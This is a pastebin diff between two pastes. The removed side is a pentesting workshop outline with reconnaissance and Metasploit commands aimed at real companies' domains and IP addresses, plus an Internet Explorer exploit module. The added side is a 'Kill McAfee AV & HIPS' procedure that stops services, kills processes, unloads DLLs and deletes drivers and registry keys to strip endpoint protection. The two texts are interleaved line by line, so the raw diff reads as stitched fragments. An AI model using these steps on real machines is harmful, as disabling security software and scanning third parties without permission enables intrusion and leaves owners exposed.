View difference between Paste ID: <a href="/nYWfafnA">nYWfafnA</a> and <a href="/Y7U6m2hg">Y7U6m2hg</a>

########################################
1	-	########################################
1	+
2	-	# FREE Advanced Pentesting Workshop #
2	+
3	-	# By Joe McCray of Strategic Security #
3	+	# Kill McAfee AV & HIPS #
4	-	#########################################
4	+
5
6	-	I thought it would be fun to give one of my advanced pentesting classes out for FREE.
6	+	1. Stop the services
7		====================
8	-	I sincerely hope that you enjoy it and will subscribe to my YouTube channel:
8	+
9	-	https://www.youtube.com/user/j0emccray
9	+	Stop the overall AV Framework
10		net stop "McAfee Framework Service"
11
12	-	I'd love it if you'd follow/like/connect with me on my other social media platforms.
12	+
13	-	Twitter: https://twitter.com/j0emccray
13	+	Stop the HIPS
14	-	Facebook: https://www.facebook.com/StrategicSec
14	+	net stop hips
15	-	LinkedIn: https://www.linkedin.com/in/joemccray
15	+	net stop enterceptagent
16		net stop firepm
17
18	-	#############################
18	+
19	-	# Download the workshop VMs #
19	+
20	-	#############################
20	+	2. Kill the processes
21	-	https://s3.amazonaws.com/StrategicSec-VMs/StrategicsecUbuntu14.zip
21	+	=====================
22	-	user: strategicsec
22	+
23	-	pass: strategicsec
23	+	McAfee Processes
24		pskill -t UdaterUI
25		pskill -t TBMon
26	-	https://s3.amazonaws.com/StrategicSec-VMs/Windows7.zip
26	+	pskill -t Mcshield
27	-	user: workshop
27	+	pskill -t VsTskMgr
28	-	pass: password
28	+	pskill -t shstat
29
30
31	-	----------------------------------------------------------------------------------------------------------------------------
31	+	HIPS Processes
32		pskill -t firetray
33
34	-	Let's start by pretending that we are assessing a pentest customer from the outside.
34	+
35
36	-	I like to start with identifying external security mechanisms.
36	+	Altiris Processes
37		pskill -t AeXNSAgent
38
39
40	-	#######################################################
40	+	Hercules Processes
41	-	# Section 1: Identifying External Security Mechanisms #
41	+	pskill -t HercUserAgent
42	-	#######################################################
42	+	pskill -t HercClient
43
44	-	Performing an external penetration test today is significantly harder than it was years ago.
44	+
45		3. Unload DLLs
46	-	There are so many external security mechanisms such as load balancers, reverse proxies, intrusion prevention systems, and web application firewalls.
46	+	==============
47
48	-	Ok, let's do this!
48	+	Unload EPO HIPS plugin
49		regsvr32 -u fireepo.dll
50	-	Start by logging into your Ubuntu virtual machine with username 'strategicsec' and password 'strategicsec'.
50	+
51
52		#####################################
53	-	###########################
53	+	# Everything below this is research #
54	-	# Target IP Determination #
54	+	#####################################
55	-	###########################
55	+
56	-	cd /home/strategicsec/toolz
56	+
57	-	perl blindcrawl.pl -d motorola.com
57	+
58		4. Remove Drivers
59	-	-- Take each IP address and look ip up here:
59	+	=================
60	-	http://www.networksolutions.com/whois/index.jsp
60	+
61		Note:
62	-	cd ~/toolz/fierce2
62	+	Somehow the "mfebopk.sys" driver needs to be unloaded. This is the Buffer Overflow protection Driver. This file should be located in "c:\windows\system32\drivers".
63	-	fierce -dns motorola.com
63	+
64	-	cd ..
64	+	naiavf5x.sys is the Anti-Virus file system driver.
65		mvstdi5x.sys is the Anti-Virus mini-Firewall driver.
66	-	-- Zone Transfer fails on most domains, but here is an example of one that works:
66	+
67	-	dig axfr heartinternet.co.uk @ns.heartinternet.co.uk
67	+
68		Research devcon.exe: http://support.microsoft.com/kb/311272
69
70	-	cd ~/toolz/
70	+	Research:
71	-	./ipcrawl 148.87.1.1 148.87.1.254 (DNS forward lookup against an IP range)
71	+	https://knowledge.mcafee.com/article/469/614226_f.SAL_Public.html
72
73
74	-	sudo nmap -sL 148.87.1.0-255
74	+	5. Remove the IPS Agent
75	-	sudo nmap -sL 148.87.1.0-255 \| grep oracle
75	+	=======================
76		To completely remove the Host IPS agent:
77
78		Disable the Host IPS agent:
79	-	###########################
79	+
80	-	# Load Balancer Detection #
80	+	1.
81	-	###########################
81	+	Open a command line session Click Start, Run, type CMD and press ENTER.
82		2.
83	-	-- Here are some options to use for identifying load balancers:
83	+	At the command line issue the following commands:
84	-	- http://toolbar.netcraft.com/site_report/
84	+	net stop hips
85	-	- Firefox LiveHTTP Headers (https://addons.mozilla.org/en-Us/firefox/addon/live-http-headers/)
85	+	net stop enterceptagent
86		net stop firepm
87	-	-- Here is an example:
87	+	3.
88	-	http://toolbar.netcraft.com/site_report/?url=citigroup.com
88	+	Close the ClientUI
89		4.
90	-	We found out that they are using a Citrix Netscaler Load Balancer.
90	+	Press CTRL+ALT+DEL, in the Security menu click Task Manager.
91	-	192.193.103.222 Citrix Netscaler
91	+	Select firetray.exe and click End Process
92	-	192.193.219.58
92	+
93		Unload the epo Plugin:
94
95	-	-- Here are some command-line options to use for identifying load balancers:
95	+	1.
96		Open regedit: Click Start, Run, type regedit and press ENTER.
97	-	dig google.com
97	+	2.
98		Delete the registry key:
99	-	cd ~/toolz
99	+	HKEY_LOCAL_MACHINE\SOFTWARE\Network Associates\ePolicy Orchestrator\Application Plugins\HOSTIPS_7000
100	-	./lbd-0.1.sh motorola.com
100	+	3.
101		At the command-line, run:
102		regsvr32 -u fireepo.dll
103	-	halberd microsoft.com
103	+
104	-	halberd motorola.com
104	+	Remove Talkback:
105	-	halberd oracle.com
105	+
106		1.
107	-	###################################################
107	+	At the command-line run:
108	-	# Section 2: Actually Using Metasploit (For real) #
108	+	C:\Program Files\Common Files\McAfee Inc\TalkBack\tbmon.exe -delref
109	-	###################################################
109	+	2.
110		Delete the folder:
111	-	sudo /sbin/iptables -F
111	+	C:\Program Files\Common Files\McAfee Inc\TalkBack
112	-	strategicsec
112	+	3.
113		Using Regedit delete the following registry entries.
114	-	cd ~/toolz/metasploit
114	+	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\SharedDlls
115		C:\Program Files\Common Files\McAfee Inc.\TalkBack\dbghelp.dll
116	-	./msfconsole
116	+	C:\Program Files\Common Files\McAfee Inc.\TalkBack\TBMon.exe
117		C:\Program Files\Common Files\McAfee Inc.\TalkBack\TBMon.loc
118	-	##############################################
118	+	C:\Program Files\Common Files\McAfee Inc\TalkBack\TBMon.exe
119	-	# Run any Linux command inside of MSFConsole #
119	+
120	-	##############################################
120	+	Remove firehk driver
121	-	ls
121	+
122		1.
123	-	pwd
123	+	At the command-line run:
124		C:\Program Files\McAfee\Host Intrusion Prevention\Inf\installfirehk.bat /u
125	-	ping -c1 yahoo.com
125	+	2.
126		Using Regedit delete the following registry entries:
127	-	nmap 192.168.10.129
127	+	HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Firehk
128		HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\FirehkMP
129	-	nmap yahoo.com
129	+	3.
130		Delete the file: C:\windows\system32\drivers\firehk.sys
131
132		Delete the hipscore service and remove the drivers:
133	-	-------------------------------
133	+
134	-	- You're on the outside scanning publicly accessable targets.
134	+	1.
135		Using Regedit delete the following registry entry:
136		HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\hips
137		2.
138	-	use auxiliary/scanner/portscan/tcp
138	+	From the command-line run:
139		C:\Program Files\McAfee\Host Intrusion Prevention\HIPSCore\mfehidin.exe -u HIPK.sys HIPPSK.sys HIPQK.sys
140	-	set RHOSTS 54.69.156.253
140	+	3.
141		Using Regedit delete the following registry entries:
142	-	set PORTS 80,1433,1521,3306,8000,8080,8081,10000
142	+	HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\HIPK
143		HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\HIPSK
144	-	run
144	+	HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\HIPQK
145		HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\mfehidk
146	-	-------------------------------
146	+	HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\mfetdik
147	-	use auxiliary/scanner/http/ (press the tab key, then press y to look through the http options)
147	+	4.
148		Delete the files:
149		C:\windows\system32\drivers\HIPK.sys
150	-	- Here is an example:
150	+	C:\windows\system32\drivers\HIPPSK.sys
151	-	use auxiliary/scanner/http/trace_axd
151	+	C:\windows\system32\drivers\HIPQK.sys
152		C:\windows\system32\hipqa.dll
153	-	- So let's do a quick google search for someone with trace.axd file
153	+	C:\windows\system32\hipis.dll
154	-	- filetye:axd inurl:trace.axd
154	+	C:\windows\system32\mfehida.dll
155		5.
156	-	set RHOSTS 207.20.57.112
156	+	From the command-line, run:
157		C:\Program Files\McAfee\Host Intrusion Prevention\HIPSCore\HIPSCoreReg.exe -u
158	-	set VHOST motion-vr.net
158	+	Using Regedit delete the following registry entries:
159		HKEY_LOCAL_MACHINE\SOFTWARE\McAfee\HIPSCore
160	-	run
160	+
161		Delete services and drivers:
162	-	-------------------------------
162	+
163		1.
164		Using Regedit delete the following registry entries:
165	-	use auxiliary/scanner/http/http_version
165	+	HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\enterceptAgent
166		HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\FirePM
167	-	set RHOSTS 54.69.156.253
167	+	HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\firelm01
168		HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\FireTDI
169	-	set RPORT 8081
169	+	2.
170		Delete the files:
171	-	run
171	+	C:\WINDOWS\system32\drivers\firelm01.sys
172		C:\WINDOWS\system32\drivers\FirePM.sys
173		C:\WINDOWS\system32\drivers\FireTDI.sys
174	-	-------------------------------
174	+
175		Remove the Host IPS registry
176	-	use auxiliary/scanner/http/tomcat_enum
176	+
177		1.
178	-	set RHOSTS 54.69.156.253
178	+	Using Regedit delete the following registry entries:
179		HKEY_LOCAL_MACHINE\SOFTWARE\McAfee\HIP
180	-	set RPORT 8081
180	+	HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Eventlog\Application\enterceptAgent
181		HKEY_LOCAL_MACHINE\SOFTWARE\Entercept\EnterceptAgent
182	-	run
182	+	HKEY_LOCAL_MACHINE\SOFTWARE\Network Associates\McAfee Fire
183		HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ McAfee Host Intrusion Prevention Tray
184
185		Remove Host IPS files
186	-	-------------------------------
186	+
187	-	- In my opinion a much better option is a script called 'discover' from Lee Baird.
187	+	1.
188		Delete the folder
189	-	- You can get it here:
189	+	C:\Program Files\McAfee\Host Intrusion Prevention
190	-	https://github.com/leebaird/discover
190	+	2.
191		Delete the files:
192	-	- On the Ubuntu attack host you can run discover by typing the following:
192	+	C:\WINDOWS\system32\FireCL.dll
193	-	cd ~/toolz/discover
193	+	C:\WINDOWS\system32\FireCNL.dll
194	-	sudo ./discover
194	+	C:\WINDOWS\system32\FireComm.dll
195		C:\WINDOWS\system32\FireCore.dll
196		C:\WINDOWS\system32\FireEpo.dll
197	-	- From here you can just follow the prompts. It will run both Nmap NSE scripts and Metasploit aux modules with all of the correct parameters for you.
197	+	C:\WINDOWS\system32\FireNHC.dll
198		C:\WINDOWS\system32\FireSCV.dll
199
200	-	##################################
200	+	Remove the shortcut:
201	-	# Basic Client-Side Exploitation #
201	+
202	-	##################################
202	+	1. Navigate to: C:\Documents and Settings\All Users\Start Menu\Programs\McAfee\
203		2. Delete the Host Intrusion Prevention shortcut.
204	-	echo j0e-r0x > /home/strategicsec/j0e-r0x.txt (You can of course replace j0e-r0x with yourname)
204	+
205		Clean up:
206	-	sudo /sbin/iptables -F
206	+
207	-	strategicsec
207	+	1.
208		Use msizap.exe to remove the MSI registry values.
209	-	cd ~/toolz/metasploit
209	+	From the command line execute:
210		msizap.exe TW! {B332732A-4958-41DD-B439-DDA2D32753C5}.
211	-	./msfconsole
211	+	2.
212		Alterntively install the Windows Installer Cleanup Utility (msicuu.exe) and use this to remove the registry keys. This displays all the MSI based products that are installed allowing selection of the product to have it's MSI data removed. For further information: http://support.microsoft.com/kb/290301/en-us
213	-	use exploit/windows/browser/ie_cgenericelement_uaf
213	+	3.
214		Restart the client.